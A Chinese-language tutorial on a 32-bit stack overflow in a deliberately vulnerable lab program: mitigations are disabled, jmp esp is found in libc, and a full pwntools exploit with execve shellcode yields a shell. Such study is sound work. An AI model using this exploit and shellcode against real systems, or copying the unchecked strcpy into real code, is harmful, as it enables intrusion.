一,工具安裝
pwntools工具安裝
$ sudo apt-get update
$ sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade pwntools
gcc/gdb安裝
$ sudo apt-get install gcc/gdb
peda安裝
$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~/.gdbinit
二,程序
源碼文件名為:StackOF.c
#include <stdio.h>
#include <string.h>
void vul(char *msg)
{
char buffer[64];
strcpy(buffer,msg);
return;
}
int main()
{
puts("So plz give me your shellcode:");
char buffer[256];
memset(buffer,0,256);
read(0,buffer,256);
vul(buffer);
return 0;
}
可以看到,其是將main函數里的buffer作為msg傳入vul函數里,然后拷貝到vul中的buffer,但是main函數中buffer大小為256,而vul函數中buffer的大小為64,這就是問題所在。
為了調試方便把保護操作關閉
gcc編譯:gcc -m32 -no-pie -fno-stack-protector -z execstack -o pwnme StackOF.c
-m32:生成32位的可執行文件
-no-pie:關閉程序ASLR/PIE(程序隨機化保護)
-fno-stack-protector:關閉Stack Protector/Canary(棧保護)
-z execstack:關閉DEP/NX(堆棧不可執行)
-o:輸出
pwnme:編譯生成文件的文件名
StackOF.c:編譯前的源文件
嘗試運行pwnme
觀察分析所開啟的漏洞緩解策略
最好加一條命令關閉系統的的地址隨機化
echo 0 > /proc/sys/kernel/randomize_va_space
三,思路
由源碼可知該棧溢出漏洞的原因是在調用strcpy之前未對源字符串的長度進行安全檢查。結果就是用戶輸入過長時,會向高地址覆蓋。
那我們可以布局成
假設jmp esp的地址為0x12345678,在運行到原返回地址位置也就是0x12345678時,會執行0x12345678處的指令,也就是jmp esp,同時esp會+4,這時esp就指向了shellcode的起始位置,jmp esp一執行,接下來就是執行shellcode,如圖:
所以要構造的
buffer = 填充字符 + jmp_esp +shellcode
四,具體解決分析
jmp esp咋整呢?這個我們可以去libc文件中查找(libc是個啥?),c編寫的程序都要加載libc文件.
1.libc怎么找?
首先,我們先查看加載的libc文件是什么版本
打開gdb調試pwnme
直接在main函數上下斷點
然后r運行,加載程序,在斷點斷下
輸入 info sharedlibrary或i sharedlibrary
這個時候你就找到了(- _-)!!!
2.找到jmp esp在libc中的地址:jmp_esp_addr_offset
很簡單,上代碼
from pwn import *
libc = ELF('/lib32/libc.so.6') #文件
jmp_esp = asm('jmp esp') #jmp esp匯編指令的操作數
jmp_esp_addr_in_libc = libc.search(jmp_esp).next() #搜索
print hex(jmp_esp_addr_in_libc) #打印
效果
但但但但是!!!!這還沒完,這個地址只是jmp esp在libc文件里的位置(也叫偏移地址,在最終代碼將命名為jmp_esp_addr_offset),要知道其在程序里的地址還要加上libc在程序里的起始地址(也叫基址,在最終代碼將命名為libc_base),所以jmp esp在程序里的地址 : jmp_esp_addr = jmp_esp_addr_offset+libc_base,結合圖解一下
3,找libc在程序里的地址:libc_base
輸入指令LD_TRACE_LOADED_OBJECTS=1 ./pwnme可以得到加載位置
4.編寫shellcode
通過調用系統調用獲得shell
\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
五,最終代碼
from pwn import *
p = process('./pwnme') #運行程序
p.recvuntil("shellcode:") #當接受到字符串'shellcode:'
#找jmp_esp_addr_offset,見本文第四節第二點
libc = ELF('/lib32/libc.so.6')
jmp_esp = asm('jmp esp')
jmp_esp_addr_offset = libc.search(jmp_esp).next()
if jmp_esp_addr_offset is None:
print 'Cannot find jmp_esp in libc'
else:
print hex(jmp_esp_addr_offset)
libc_base = 0xf7dd1000 #你找到的libc加載地址
jmp_esp_addr = libc_base + jmp_esp_addr_offset #得到jmp_esp_addr
print hex(jmp_esp_addr)
#構造布局,本文第三節
buf = 'A'*76 #如何得到填充數據大小:http://www.lxweimin.com/p/278f8d1f8322
buf += p32(jmp_esp_addr)
buf += '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
with open('poc','wb') as f:
f.write(buf)
p.sendline(buf) #發送構造后的buf
p.interactive()
六,效果
輸入
whoami測試一下
發現為
root用戶,已經可以產生交互。附上相關文章一篇:http://www.mamicode.com/info-detail-2232012.htm
